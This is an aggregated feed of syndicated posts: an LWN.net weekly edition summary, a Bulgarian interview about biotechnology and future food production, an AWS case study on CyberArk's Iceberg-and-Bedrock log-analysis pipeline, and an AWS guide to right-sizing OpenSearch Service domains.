[$] LWN.net Weekly Edition for February 19, 2026

Post Syndicated from jzb original https://lwn.net/Articles/1058474/

Inside this week’s LWN.net Weekly Edition:

  • Front: AI agent goes rogue; debuginfo; iocane; revocable resource-management patches; 7.0 merge window; AccECN; LLMs and security; Humanitarian OpenStreetMap Team.
  • Briefs: upki; Asahi Linux progress; DFSG processes; Fedora in Syria; Plasma 6.6.0; Vim 9.2; …
  • Announcements: Newsletters, conferences, security updates, patches, and more.

Тоест разговаряме – епизод 7

Post Syndicated from Владислав Севов original https://www.toest.bg/toest-razgovaryame-epizod-7/

Тоест разговаряме – епизод 7

В седмия епизод на видеопоредицата „Тоест разговаряме“ с Михаил Ангелов коментирахме границите и възможностите на съвременната наука – от генетичното редактиране с CRISPR до бъдещето на храните и добива им. Той обясни как новите биотехнологии вече дават реални решения за лечение на тежки заболявания и по-устойчиво земеделие, но същевременно поставят сериозни етични въпроси. Разговорът ни се отправи и към космическите изследвания и завръщането на хората към Луната чрез мисията Artemis II. Обсъдихме как научните пробиви не са чудеса, а резултат от многогодишни усилия, работа, проверки и корекции.

Засегнахме и темата за недоверието към науката, митовете около ГМО и ваксините и защо несигурността е естествена част от научния процес, а не негов дефект. Обобщихме, че писането за наука, също както заниманието с наука, е бавен процес, който изисква търпение, създава условия за натрупване на знания, за критично мислене и разумен обществен диалог.

Гледайте целия епизод в нашия YouTube канал:

Може да го чуете и като аудиозапис в SoundCloud:



След разговора помолих Михаил да отговори тук на още един зрителски въпрос, който ограниченото ефирно време не ни позволи да обхванем:

В следващите десет години как ще се промени начинът, по който отглеждаме храната си и се храним? Предвид все по-големия натиск (основателен) да преминаваме преобладаващо към растителна диета… С други думи, как и къде ще си гледаме зеленчуците и плодовете?

С промените в климата най-вероятно ще има изместване на „традиционните“ култури от едни в други географски зони и преминаване към отглеждане на закрито – било то в оранжерии с използване на слънчевата светлина или в напълно затворени пространства със специализирани осветителни тела. Мисля, че преминаването към отглеждане на растения без почва ще се превърне от сравнително нишово във вече наложително решение.

Отглеждането в изкуствена среда (торене и осветление) има потенциал за по-високи добиви и по-малък риск от загуба на продукцията, което означава и по-високи приходи. Разбира се, органичните продукти ще останат търсени и отглеждането им по традиционни методи ще продължи. Предполагам, че това (особено в дългосрочен план) ще става все по-скъпо поради промените в климата, нуждата от повече пространство за отглеждане на същото количество продукция и труда, свързан с отглеждането им.

Преминаването обаче към растителна диета не е обезателно. Ако успеем да прескочим предубежденията си, в момента има опция да включим в менюто си и протеин от насекоми. Той има значително по-малък екологичен отпечатък и може да предостави достъп до животински протеин на огромен брой хора, които в момента се хранят основно с растения. В още по-оптимистичен план, ако производството на месо от клетъчни култури се наложи по-масово, се създава предпоставка проблемът да се реши в голяма степен, стига потребителите да приемат продукти, сходни с кайма и кренвирши, вместо пържоли.

Каквото и да се случи, по всичко изглежда, че тенденцията земеделието да става все по-технологичен сектор, който се отдалечава от „градината на баба“, ще се засили.

Преди срещата ви помолихме да отговорите на кратката ни анкета. Ето и резултатите от нея:

ГМО е модифициране на гените на даден организъм с цел променяне, премахване или добавяне на външни и/или вътрешни белези.


Михаил Ангелов е биолог, агроном и магистър по растителна защита. От повече от десет години работи в сферата на растителната молекулярна генетика и селекция. Има няколко специализации, последната от които е в един от водещите европейски центрове за растителни изследвания – Института по растителна системна биология (VIB–PSB) към Университета в Гент, Белгия. В момента работи върху докторантура, свързана с абиотичния стрес при растенията. Основните му интереси са възможностите за редакция на генома, предоставени от новите геномни техники (напр. CRISPR), съвременните селекционни подходи, както и производството на различни биотехнологични продукти с помощта на прецизни ферментации.


Тоест разговаряме – епизод 7

Следващата среща на „Тоест разговаряме“ ще бъде с арх. Анета Василева и ще се проведе на живо в YouTube Live на 7 март, събота, от 16:00 ч.


В „Тоест разговаряме“ всеки месец ви срещаме с автори, които познавате добре от анализите или от рубриките им в „Тоест“, но този път ще ги видите и чуете в по-личен и непосредствен формат. Във видеоразговорите, предавани на живо, активно участие имате и вие, нашата публика – със своите въпроси, коментари и включване в тематичната анкета. Водещ на поредицата е Владислав Севов, дългогодишен телевизионен журналист и съосновател на „Тоест“.

Тоест разговаряме – епизод 7

„Тоест разговаряме“ е поредица, подкрепена от Институт „Отворено общество – София“ и съфинансирана от Европейския съюз в рамките на проекта Media Resilience. Изразените възгледи и мнения са само и изцяло на техните автори и не отразяват непременно възгледите и мненията на Европейския съюз, на Европейската изпълнителна агенция за образование и култура (EACEA) или на Институт „Отворено общество – София“ (ИООС). Нито Европейският съюз, нито EACEA, нито ИООС могат да бъдат държани отговорни за тях.

How CyberArk uses Apache Iceberg and Amazon Bedrock to deliver up to 4x support productivity

Post Syndicated from Moshiko Ben Abu original https://aws.amazon.com/blogs/big-data/how-cyberark-uses-apache-iceberg-and-amazon-bedrock-to-deliver-up-to-4x-support-productivity/

This post is co-written with Moshiko Ben Abu, Software Engineer at CyberArk.

CyberArk achieved up to 95% reduction in case resolution time using Amazon Bedrock and Apache Iceberg.

This improvement addresses a challenge in technical support workflow: when a support engineer receives a new customer case, the biggest bottleneck is often not diagnosing the problem but preparing the data. Customer logs arrive in different formats from multiple vendors, and each new log format typically requires manual integration and correlation before an investigation can begin. For simple cases, this process can take hours. For more complex investigations, it can take days, slowing resolution and reducing overall engineer productivity.

CyberArk is a global leader in identity security. Centered on intelligent privilege controls, it provides comprehensive security for human, machine, and AI identities across business applications, distributed workforces, and hybrid cloud environments.

In this post, we show you how CyberArk redesigned their support operations by combining Iceberg’s intelligent metadata management with AI-powered automation from Amazon Bedrock. You’ll learn how to simplify data processing flows, automate log parsing for diverse formats, and build autonomous investigation workflows that scale automatically.

To achieve these results, CyberArk needed a solution that could ingest customer logs, automatically structure them, establish relationships between related events, and make everything queryable in minutes, not days. The architecture had to be serverless to handle unpredictable support volumes, secure enough to protect customer Personally Identifiable Information (PII), and fast enough to allow same day case resolution.

The legacy architecture: Bottlenecks and manual workflows

When support engineers received customer cases, they would upload log files to the data lake stored in Amazon Simple Storage Service (Amazon S3). The original design then suffered from the complexity of multi-step raw data processing.

First, CyberArk’s custom parsing logic running on AWS Fargate would parse these uploaded log files and transform the raw data. During this stage, the system also had to scan for PII and mask sensitive data to protect customer privacy.

Next, a separate process converted the processed data into Parquet format.

Finally, AWS Glue crawlers were required to discover new partitions and update table metadata for processed Parquet files. This dependency became the most complex and time-consuming part of the pipeline. Crawlers ran as asynchronous batch jobs rather than in real time, often introducing delays of minutes to hours before support engineers could query the data.

But the inefficiency went deeper than just architectural complexity. CyberArk supports customers running diverse product environments across multiple vendors. Each vendor and product produces logs in different formats with unique schemas, field names, and structures. Adding support for a new vendor meant days of integration work to understand their log format and build custom parsers.

CyberArk Legacy Logs Ingestion Flow

Figure 1: Legacy log ingestion architecture diagram showing the flow from S3 upload through AWS Fargate processing with AWS Glue Crawler

Beyond ingestion, the investigation process itself was manual and time consuming. Support engineers would manually query data, correlate events across different log sources, search through product documentation, and piece together root cause analysis through trial and error. This process required deep product expertise and could take hours or days depending on issue complexity. The new architecture addresses these inefficiencies through three key innovations:

  1. Single stage serverless processing: AWS Fargate with PyIceberg directly creates Iceberg tables from raw logs in one pass, removing intermediate processing steps and crawler dependencies entirely.
  2. AI powered dynamic parsing: Amazon Bedrock automatically generates grok patterns for log parsing by analyzing file schemas, transforming what was once a manual, time consuming process into a fully automated workflow.
  3. Autonomous investigation with AI Agents: AI Agents autonomously perform complete root cause analysis by querying log data, analyzing product knowledge bases, identifying event flows, and recommending solutions, transforming hours of manual investigation into minutes of automated intelligence.

The solution: AI-powered automation meets single-stage Iceberg processing

The new system delivers zero touch log processing from upload to query. Support engineers simply upload customer log ZIP files to the system. Here’s where the transformation happens: CyberArk’s custom processing logic still runs on AWS Fargate, but now it uses Amazon Bedrock to intelligently understand the data.

Zero-touch log processing workflow

The system extracts sample log entries from the uploaded log files and sends them to Amazon Bedrock along with context about the log source and table schema from AWS Glue Data Catalog. Amazon Bedrock analyzes the samples, understands the structure, and automatically generates grok patterns optimized for the specific log format.

Grok patterns are structured expressions that define how to extract meaningful fields from unstructured log text. For example, the following grok pattern specifies that a timestamp appears first, followed by a severity level, then a message body %{TIMESTAMP_ISO8601:timestamp} %{LOGLEVEL:severity} %{GREEDYDATA:message}

The system validates these grok patterns against additional samples to verify accuracy before applying them to parse the complete log file. Successfully validated grok patterns are stored in Amazon DynamoDB, creating a repository of known patterns. When the system encounters similar log formats in future uploads, it can retrieve these patterns directly from Amazon DynamoDB, avoiding redundant grok pattern generation. Amazon Bedrock processes log samples in real-time without retaining customer data or using it for model training, maintaining data privacy.

This entire process invokes Claude 3.7 Sonnet model from Amazon Bedrock and is orchestrated by AWS Fargate tasks with retry logic for reliability. The processing uses these AI-generated grok patterns to parse the logs and create or update Iceberg tables using PyIceberg APIs without human intervention.

This automation reduced logs onboarding time from days to minutes, enabling CyberArk to handle diverse customer environments without manual intervention.

Figure 2: Log ingestion architecture diagram showing the flow from S3 upload through AWS Fargate processing with Amazon Bedrock integration to Iceberg table creation

Figure 2: Log ingestion architecture diagram showing the flow from S3 upload through AWS Fargate processing with Amazon Bedrock integration to Iceberg table creation

Apache Iceberg: Simplified architecture, faster queries

Iceberg simplified and improved CyberArk’s data lake architecture by addressing the two primary bottlenecks in the legacy system: slow schema management and inefficient query performance.

Built-in schema evolution removes crawler dependency

In the legacy architecture, AWS Glue crawlers became a source of operational overhead and latency. Even when triggered on demand, crawlers ran as batch jobs over S3 prefixes to discover partitions and update metadata. As data volumes grew and datasets diversified across vendors and schemas, teams had to manage and operate a growing number of crawler jobs. The resulting delays, often ranging from minutes to hours, slowed data availability and downstream investigation workflows.

Iceberg removes this entire layer of complexity. Iceberg’s intelligent metadata layer automatically tracks table structure, schema changes, and partition information as data is written. When CyberArk’s processing creates or updates Iceberg tables through PyIceberg, the metadata is updated instantly and atomically. There’s no waiting for crawlers jobs to complete, and no risk of stale metadata. The moment data is written, it’s immediately queryable in Amazon Athena.

PyIceberg: Making Iceberg accessible beyond Apache Spark

Working with Iceberg usually involved Apache Spark and the complexity of distributed data processing. PyIceberg changed that by letting CyberArk create and manage Iceberg tables using a simple Python library. CyberArk’s data engineers could write straightforward Python code running on AWS Fargate to create Iceberg tables directly from parsed logs, without spinning up Spark clusters.

This accessibility was essential for CyberArk’s serverless architecture. PyIceberg enabled single stage processing where AWS Fargate tasks could parse logs, apply PII masking, and create Iceberg tables in one pass. The result was simpler code and lower operational overhead.

Metadata-driven query optimization delivers speed

In addition to removing crawlers, Iceberg significantly improved query performance through its intelligent metadata architecture. Iceberg maintains detailed statistics about data files, including min/max values, null counts, and partition information. When support engineers query data in Athena, Iceberg’s metadata layer supports partition pruning and file skipping, making sure queries only read the specific files containing relevant data. For CyberArk’s use case, where tables are partitioned by case ID, this means a query for a specific support case only reads the files for that case, ignoring potentially thousands of irrelevant files. This metadata driven optimization reduced query execution time from minutes to seconds, allowing support engineers to interactively explore data rather than waiting for results.

ACID transactions maintain data consistency

In a multi user support environment where multiple engineers may be analyzing overlapping cases or uploading logs simultaneously, data consistency is essential. Iceberg’s ACID transaction support helps verify that concurrent writes do not corrupt data or create inconsistent states. Each table update is atomic, isolated, and durable, providing the reliability CyberArk needed for production support operations.

Time travel enables historical analysis

Iceberg’s built-in versioning allows support engineers to query historical states of data, essential for understanding how customer issues evolved over time. If an engineer needs to see what the logs looked like when a case was first opened versus after a customer applied a patch, Iceberg’s time travel capabilities make this straightforward. This feature proved essential for complex troubleshooting scenarios where understanding the timeline of events was critical to resolution.

Automated table optimization with AWS Glue

Iceberg tables require periodic maintenance to maintain query performance.

CyberArk enabled AWS Glue automatic table optimization for their Iceberg tables, which handles compaction and expired snapshot cleanup in the background.

For CyberArk’s continuous upload workflow, this automation avoids performance degradation over time. Tables stay optimized without manual intervention from the engineering team.

AI Agents: Autonomous investigation workflow

While the Claude 3.7 Sonnet model from Amazon Bedrock automates grok pattern generation for log ingestion, the more advanced use of Amazon Bedrock comes in the investigation workflow. We use AI agents with Bedrock models to change how support engineers analyze and resolve customer issues.

From manual analysis to AI powered investigation

In the legacy workflow, support engineers would manually query data, correlate events across different log sources, search through product documentation, and piece together root cause analysis through trial and error. This process required deep product expertise and could take hours or days depending on issue complexity. AI Agents automate this entire investigation process. Support engineers use an internal portal to ask questions in natural language about customer issues, questions like
“Show me authentication errors for case 12345 in the last 24 hours”, “What were the most common errors across cases opened this week?” or “Compare the error patterns between case 12345 and case 12346.”

Behind the scenes, the system fires specialized AI Agents that autonomously perform thorough analysis.

How support agents work

Each AI Agent operates as an intelligent investigator with a clear mission: understand what happened, determine why it happened, and recommend how to fix it. When a support engineer asks a question, the agent collects relevant data by querying Athena to retrieve log data from Iceberg tables, filtering for the specific case and time period relevant to the investigation. The agent then accesses CyberArk’s internal knowledge base for the specific product involved, understanding known issues, common error patterns, and documented solutions. The agent then performs the following analysis:

  • Flow identification: Analyzes the sequence of events in the logs to understand what actually happened during the customer’s issue
  • Root cause determination: Correlates log events with product knowledge to identify the underlying cause of the problem
  • Solution recommendations: Suggests specific remediation steps based on the root cause analysis and known resolution patterns

This entire process happens in minutes, delivering advanced analysis that would have taken support engineers hours to perform manually.

For complex cases where a solution is not found, the support agent escalates to another, specialized agent that interacts with service engineers to collect additional inputs and expertise. This human-in-the-loop approach makes sure that even the most challenging cases receive appropriate attention while still benefiting from the automated investigation workflow. The insights gathered from these escalated cases are automatically fed back into CyberArk’s knowledge base, continuously improving the system’s ability to handle similar issues autonomously in the future.

Amazon Bedrock never shares customer data with model providers or uses it to train foundation models, case data and investigation insights remain within CyberArk’s environment.

Concurrent agent execution at scale

When multiple support engineers investigate different cases simultaneously, the solution runs specialized agents concurrently. CyberArk currently uses Claude 3.7 Sonnet as the foundation model for these agents. Each agent works independently on its assigned investigation, operating in parallel without resource contention. This concurrent execution allows the investigation workflow to scale automatically with support volume, handling peak loads without performance degradation.

AI-powered investigation advantage

This AI-powered investigation workflow delivers two key advantages.

Investigations that took hours now complete in minutes, enabling support engineers to resolve up to 4x more cases per day.

The system also creates a continuous learning feedback loop. When cases require manual resolution by engineers, these resolutions are automatically recorded and fed back into the knowledge base. Future investigations benefit from this accumulated expertise, with agents applying lessons learned from previous manual resolutions to similar cases. Amazon Bedrock doesn’t use customer data to train foundation models. Case data and investigation insights remain within CyberArk’s environment.
This automated feedback mechanism means the investigation workflow becomes more effective over time, continuously improving resolution accuracy and speed.

CyberArk - AI Powered Logs Investigation Flow

Figure 3: Investigation workflow diagram showing natural language query through AI Agents to Athena queries and knowledge base analysis

Scaling without proportional engineering growth

The business impact of this AI automation is significant. CyberArk can expand its vendor coverage and product portfolio without adding data engineering headcount. The same system that handles today’s log types will automatically handle tomorrow’s additions, whether that’s ten new formats or thousands, significantly reducing time to market for new product and vendor integrations.

The results: Significant improvements in resolution time and productivity

The transformation delivered measurable improvements across every key metric.

Resolution time: CyberArk achieved up to 95% reduction in time from case assignment to resolution. Simple cases that used to take 4 to 6 hours now take just 15 to 30 minutes. Complex cases that previously took up to 15 days are now completed in 2 to 4 hours.

Engineer productivity: Support engineers now handle 8 to 12 cases per day, compared to just 2 to 3 cases before. This means each engineer is helping up to 4x more customers.

Data availability: Logs are queryable within minutes of upload instead of waiting hours or days. Support engineers can start investigating issues almost immediately after receiving customer data.

Operational efficiency: The system requires zero manual intervention for new log formats or schema changes. Cases that used to require days of data engineering work now happen automatically.

Cost optimization: The serverless architecture alleviated idle infrastructure costs while scaling automatically with demand. CyberArk only pays for what they use, when they use it.

Customer satisfaction: Faster resolution times and proactive issue identification significantly improved the customer experience. Problems get solved in hours instead of days, and customers spend less time waiting for answers.

What’s next?

While AWS continues to innovate across both data lake management and agentic AI infrastructure, the following capabilities align well with CyberArk’s architecture and may offer additional operational benefits as the system scale.

Agent infrastructure maturity

As the agent-based architecture scales to handle thousands of concurrent investigations, CyberArk is transitioning to Amazon Bedrock AgentCore for future agent deployments. AgentCore provides a managed runtime for production AI agents with enhanced observability through AWS X-Ray integration, intelligent memory for context retention across sessions, and streamlined operational workflows. While the current AI Agents implementation delivers the performance and reliability CyberArk needs today, AgentCore represents a natural evolution path as operational requirements grow, offering framework-agnostic deployment, automatic scaling, and comprehensive monitoring capabilities without infrastructure management overhead.

Amazon S3 Tables

CyberArk’s current architecture uses Iceberg tables stored in Amazon S3 buckets. Amazon S3 Tables offers fully managed Iceberg tables with built-in optimization.

As CyberArk continue to scale with hundreds of Iceberg tables and rapid data growth, CyberArk is exploring a migration to Amazon S3 Tables to further reduce operational overhead.

S3 Tables remove the need to set up and monitor AWS Glue maintenance jobs. It automatically performs maintenance to enhance the performance of Iceberg tables, including unreferenced file removal, file compaction, and snapshot management. Additionally, S3 Tables provides Intelligent-Tiering that automatically moves data between storage classes based on access patterns, optimizing storage costs without manual intervention.

Because S3 Tables uses Iceberg open table format, migration would not require changes to existing Athena queries and PyIceberg code. This flexibility allows CyberArk to evaluate and adopt S3 Tables when the operational and cost benefits align with their business needs.

Conclusion

CyberArk’s transformation demonstrates how combining modern data lake architecture with AI automation can significantly change operational economics. By combining Iceberg’s intelligent metadata management with AI-powered automation from Amazon Bedrock, CyberArk transformed case resolution from days to minutes while enabling support operations to scale automatically with business growth. Support engineers now spend their time solving customer problems instead of wrangling data, customers receive faster resolutions, and the system scales automatically with the business.

To learn more about Iceberg on AWS, refer to Working with Amazon S3 Tables and table buckets and Using Apache Iceberg on AWS. To learn more about Amazon Bedrock AgentCore, refer to Amazon Bedrock AgentCore.


About the authors

Moshiko Ben Abu

Moshiko Ben Abu

Moshiko is a Software Engineer at CyberArk, specializing in architecting cloud-native applications and building AI-powered solutions. Moshiko advocates for a shift-left approach where security is built in from day one. His drive for innovation has been recognized across the company, earning him the Innovator culture award at CyberArk’s Global Kickoff.

Riki Nizri

Riki Nizri

Riki is a Solutions Architect at AWS. Collaborating with AWS ISV customers, Riki helps them leverage AWS services to build modern, efficient solutions that drive measurable business outcomes.

Sofia Zilberman

Sofia Zilberman

Sofia works as a Senior Streaming Solutions Architect at AWS, helping customers design and optimize real-time data pipelines using open-source technologies like Apache Flink, Kafka, and Apache Iceberg. With experience in both streaming and batch data processing, she focuses on making data workflows efficient, observable, and high-performing.

Best practices for right-sizing Amazon OpenSearch Service domains

Post Syndicated from Nikhil Agarwal original https://aws.amazon.com/blogs/big-data/best-practices-for-right-sizing-amazon-opensearch-service-domains/

Amazon OpenSearch Service is a fully managed service for search, analytics, and observability workloads, helping you index, search, and analyze large datasets with ease. Making sure your OpenSearch Service domain is right-sized—balancing performance, scalability, and cost—is critical to maximizing its value. An over-provisioned domain wastes resources, whereas an under-provisioned one risks performance bottlenecks like high latency or write rejections.

In this post, we guide you through the steps to determine if your OpenSearch Service domain is right-sized, using AWS tools and best practices to optimize your configuration for workloads like log analytics, search, vector search, or synthetic data testing.

Why right-sizing your OpenSearch Service domain matters

Right-sizing your OpenSearch Service domain provides optimal performance, reliability, and cost-efficiency. An undersized domain leads to high CPU utilization, memory pressure, and query latency, whereas an oversized domain drives unnecessary spend and resource waste. By continuously matching domain resources to workload characteristics such as ingestion rate, query complexity, and data growth, you can maintain predictable performance without overpaying for unused capacity.

Beyond cost and performance, right-sizing facilitates architectural agility. It helps make sure your cluster scales smoothly during traffic spikes, meets SLA targets, and sustains stability under changing workloads. Regularly tuning resources to match actual demand optimizes infrastructure efficiency and supports long-term operational resilience.

Key Amazon CloudWatch metrics

OpenSearch Service provides Amazon CloudWatch metrics that offer insights into various aspects of your domain’s performance. These metrics fall into 16 different categories, including cluster metrics, EBS volume metrics, and instance metrics. To determine if your OpenSearch Service domain is misconfigured, monitor these common symptoms that indicate resizing or optimization may be necessary. These are caused by imbalances in resource allocation, workload demands, or configuration settings. The following table summarizes these parameters:

CloudWatch Metrics Parameter
CPU Utilization Metrics CPUUtilization: Average CPU usage across all data nodes.

  • Optimal range: 60-80% for sustained workloads

Primary control plane CPU utilization (for dedicated primary nodes): Average CPU usage on primary nodes.

  • Optimal range: Under normal conditions <50%
Memory Utilization Metrics JVMMemoryPressure: Percentage of heap memory used across data nodes.

  • Optimal range: 65–85%

Note: With Garbage First Garbage Collector (G1GC), JVM may delay collections to optimize performance. Evaluate JVMMemoryPressure together with GC metrics (Old Gen usage and GC pause time) to confirm true pressure trends.

MasterJVMMemoryPressure: Heap usage on dedicated primary nodes.

  • Optimal range: <80%

Note: Occasional spikes are normal during state updates; sustained high memory pressure warrants scaling or tuning.

Storage Metrics StorageUtilization: Percentage of storage space used.

  • Optimal range: 70–85%

FreeStorageSpace: Available storage in MB.

  • Critical threshold: When approaching the read-only threshold.

Node Level Search and Indexing Performance

(These latencies are not per-request latencies or rate, but at node level based on shards assigned to a node.)

SearchLatency: Average time for search requests.

  • Baseline establishment: Monitor during normal operations.

IndexingLatency: Average time for indexing operations.

  • Impact: Can indicate CPU or I/O bottlenecks.

SearchRate and IndexingRate: Requests per minute for search and indexing.

  • Usage: Correlate with latency metrics to understand performance impact.
Cluster Health Indicators ClusterStatus.yellow and ClusterStatus.red:

  • Yellow status: Some replica shards are unassigned.
  • Red status: Some primary shards are unassigned (data loss risk).

Nodes

  • What it measures: Number of nodes in the cluster.
  • Usage: Track node failures and recovery patterns.

Signs of under-provisioning

Under-provisioned domains struggle to handle workload demands, leading to performance degradation and cluster instability. Look for sustained resource pressure and operational errors that signal the cluster is running beyond its limits. For monitoring, you can set CloudWatch alarms to catch early signals of stress and prevent outages or degraded performance. The following are critical warning signs:

  • High CPU utilization for data nodes (>80%) sustained over time (such as more than 10 minutes)
  • High CPU utilization for primary nodes (>60%) sustained over time (such as more than 10 minutes)
  • JVM memory pressure consistently high (>85%) for data and primary nodes
  • Storage utilization reaching high (>85%)
  • Increasing search latency with stable query patterns (increasing by 50% from baseline)
  • Frequent cluster status yellow/red events
  • Node failures under normal load conditions

When resources are constrained, the end-user experience suffers with slower searches, failed indexing, and system errors. The following are key performance impact indicators:

Remediation recommendations

The following table summarizes CloudWatch metric symptoms, possible causes, and potential solutions.

CloudWatch metric symptom Causes and solution
FreeStorageSpace drops <20%

Storage pressure occurs when data volume outgrows local storage due to high ingestion, long retention without cleanup, or unbalanced shards. Lack of tiering (such as UltraWarm) further worsens capacity issues.

Solution: Free up space by deleting unused indexes or automating cleanup with ISM and use force merge on read-only indexes to reclaim storage. If pressure persists, scale vertically or horizontally, use UltraWarm or cold storage for older data, and adjust shard counts at rollover for better balance.

CPUUtilization and JVMMemoryPressure consistently >70%

High CPU or JVM pressure arises when instance sizes are too small or shard counts per node are excessive, leading to frequent GC pauses. Inefficient shard strategy, uneven distribution, and poorly optimized queries or mappings further spike memory usage under heavy workloads.

Solution: Address high CPU/JVM pressure by scaling vertically to larger instances (such as from r6g.large to r6g.xlarge) or adding nodes horizontally. Optimize shard counts relative to heap size, smooth out peak traffic, and use slow logs to pinpoint and tune resource-heavy queries.

SearchLatency or IndexingLatency spikes >500 milliseconds

Thread pool rejections often stem from resource contention like high CPU/JVM pressure or GC pauses. Inefficient shard sizing, over-sharding, and overly complex queries (deep aggregations, frequent cache evictions) further increase overhead and push tasks into rejection.

Solution: Reduce query latency by optimizing queries with profiling, tuning shard sizes (10–50 GB each), and avoiding over-sharding. Improve parallelism by scaling the cluster, adding replicas for read capacity, increasing cache through larger nodes, and setting appropriate query timeouts.

ThreadpoolRejected metrics indicate queued requests

Thread pool rejections occur when high concurrent requests overflow queues beyond capacity, especially with undersized nodes limited by vCPU-based threads. Sudden unscaled traffic spikes further overwhelm pools, causing tasks to be dropped or delayed.

Solution: Mitigate thread pool rejections by enforcing shard balance across nodes, scaling horizontally to boost thread capacity, and managing client load with retries and reduced concurrency. Monitor search queues, right-size instances for vCPUs, and cautiously tune thread pool settings to handle bursty workloads.

ThroughputThrottle or IopsThrottle reach 1

I/O throttling arises when Amazon EBS or Amazon EC2 limits are exceeded, such as gp3’s 125 MBps baseline, or when burst credits are depleted due to sustained spikes. Mismatched volume types and heavy operations like bulk indexing without optimized storage further amplify throughput bottlenecks.

Solution: Address I/O throttling by upgrading to gp3 volumes with higher baseline or provisioning extra IOPS and consider I/O-optimized instances like i3/i4 families while monitoring burst balance. For sustained workloads, scale nodes or schedule heavy operations during off-peak hours to avoid hitting throughput caps.

Signs of over-provisioning

Over-provisioned clusters show consistently low utilization across CPU, memory, and storage, suggesting resources far exceed workload demands. Identifying these inefficiencies helps reduce unnecessary spend without impacting performance. You can use CloudWatch alarms to track cluster health and cost-efficiency metrics over 2–4 weeks to confirm sustained underutilization:

  • Low CPU utilization for data and primary nodes (<40%) sustained over time
  • Low JVM memory pressure for data and primary nodes (<50%)
  • Excessive free storage (>70% unused)
  • Underutilized instance types for workload patterns

Monitor cluster indexing and search latencies constantly as the cluster is being downsized—these latencies should not increase if the cluster is eliminating unused capacity. Also, it’s recommended to reduce nodes one at a time and continue to observe latencies to continue further downturn. By right-sizing instances, reducing node counts, and adopting cost-efficient storage options, you can align resources to actual usage. Optimizing shard allocation further supports balanced performance at a lower cost.

Best practices for right-sizing

In this section, we discuss best practices for right-sizing.

Iterate and optimize

Right-sizing is an ongoing process, not a one-time exercise. As workloads evolve, continuously monitor CPU, JVM memory pressure, and storage utilization using CloudWatch to make sure they remain within healthy thresholds. Rising latency, queue buildup, or unassigned shards often signal capacity or configuration issues that require attention.

Regularly review slow logs, query latency, and ingestion trends to identify performance bottlenecks early. If search or indexing performance degrades, consider scaling, rebalancing shards, or adjusting retention policies. Periodic reviews of instance sizes and node count help align cost with demand, maintaining 200-millisecond latency targets while avoiding over-provisioning. Consistent iteration helps your OpenSearch Service domain remain performant and cost-efficient over time.

Establish baselines

Monitor for 2–4 weeks after initial deployment and document peak usage patterns and seasonal variations. Record performance during different workload types. Set appropriate CloudWatch alarm thresholds based on your baselines.

Regular review process

Conduct weekly metric reviews during initial optimization and monthly assessments for stable workloads. Conduct quarterly right-sizing exercises for cost optimization.

Scaling strategies

Consider the following scaling strategies:

Vertical scaling (instance types) – Use larger instance types when performance constraints stem from CPU, memory, or JVM pressure, and overall data volume is within a single node’s capacity. Choose memory-optimized instances (such as r8g, r7g, or r7i) for heavy aggregation or indexing workloads. Use compute-optimized instances (c8g, c7g, or c7i) for CPU-bound workloads such as query-heavy or log-processing environments. Vertical scaling is ideal for smaller clusters or testing environments where simplicity and cost-efficiency are priorities.

Horizontal scaling (node count) – Add more data nodes when storage, shard count, or query concurrency increases beyond what a single node can handle. Maintain an odd number of primary-eligible nodes (typically three or five) and use dedicated primary nodes for clusters with more than 10 data nodes. Deploy across three Availability Zones for high availability in production. Horizontal scaling is preferred for large, production-grade workloads requiring fault tolerance and sustained growth. Use _cat/allocation?v to verify shard distribution and node balance:

GET /_cat/allocation/node_name_1,node_name_2,node_name_3

Optimize storage configuration

Use the latest generation of Amazon EBS General Purpose (gp) volumes for improved performance and cost-efficiency compared to earlier versions. Monitor storage growth trends using ClusterUsedSpace and FreeStorageSpace metrics. Maintain data utilization below 50% of total storage capacity to allow for growth and snapshots.

Choose storage tiers based on performance and access patterns—for example, enable UltraWarm or cold storage for large, infrequently accessed datasets. Move older or compliance-related data to cost-efficient tiers (for analytics or WORM workloads) only after ensuring the data is immutable.

Use the _cat/indices?v API to monitor index sizes and refine retention or rollover policies accordingly:

GET /_cat/indices/index1,index2,index3

Analyze shard configuration

Shards directly affect performance and resource usage, so an appropriate shard strategy should be used. The indexes that have heavy ingestion and searches should have a number of shards in the order of number of nodes for better efficiency across all data nodes in the cluster. We recommend keeping shard sizes between 10–30 GB for search workloads and up to 50 GB for log analytics workloads and limit to <20 shards per GB of JVM heap.

Run _cat/shards?v to confirm even shard distribution and no unassigned shards. Evaluate over-sharding by checking JVMMemoryPressure (>80%) or SearchLatency spikes (>200 milliseconds) from excessive shard coordination. Assess under-sharding if IndexingLatency (>200 milliseconds) or low SearchRate indicates limit parallelism. Use _cat/allocation?v to identify unbalanced shard sizes or hot spots on nodes:

GET /_cat/allocation/node_name_1,node_name_2,node_name_3

Handling unexpected traffic spikes

Even well right-sized OpenSearch Service domains can face performance challenges during sudden workload surges, such as log bursts, search traffic peaks, or seasonal load patterns. To handle such unexpected spikes effectively, consider implementing the following best practices:

  • Enable Auto-Tune – Automatically adjust cluster settings based on current usage and traffic patterns
  • Distribute shards effectively – Avoid shard hotspots by using balanced shard allocation and index rollover policies
  • Pre-warm clusters for known events – For expected peak periods (end-of-month reports, marketing campaigns), temporarily scale up before the spike and scale down afterward
  • Monitor with CloudWatch alarms – Set proactive alarms for CPU, JVM memory, and thread pool rejections to catch early stress indicators

Deploy CloudWatch alarms

CloudWatch alarms perform an action when a CloudWatch metric exceeds a specified value for some amount of time to take remediation action proactively.

Conclusion

Right-sizing is a continuous process of observing, analyzing, and optimizing. By using CloudWatch metrics, OpenSearch Dashboards, and best practices around shard sizing and workload profiling, you can make sure your domain is efficient, performant, and cost-effective. Right-sizing your OpenSearch Service domain helps provide optimal performance, cost-efficiency, and scalability. By monitoring key metrics, optimizing shards, and using AWS tools like CloudWatch, ISM, and Auto Scaling, you can maintain a high-performing cluster without over-provisioning.

For more information about right-sizing OpenSearch Service domains, refer to Sizing Amazon OpenSearch Service domains.


Nikhil Agarwal

Nikhil Agarwal

Nikhil is a Sr. Technical Manager with Amazon Web Services. He is passionate about helping customers achieve operational excellence in their cloud journey and working actively on technical solutions. He is also enthusiastic about AI/ML, generative AI, and analytics, and deep dives into customers’ generative AI and Amazon OpenSearch Service specific use cases. Outside of work, he enjoys traveling with family and exploring different gadgets.

Rick Balwani

Rick Balwani

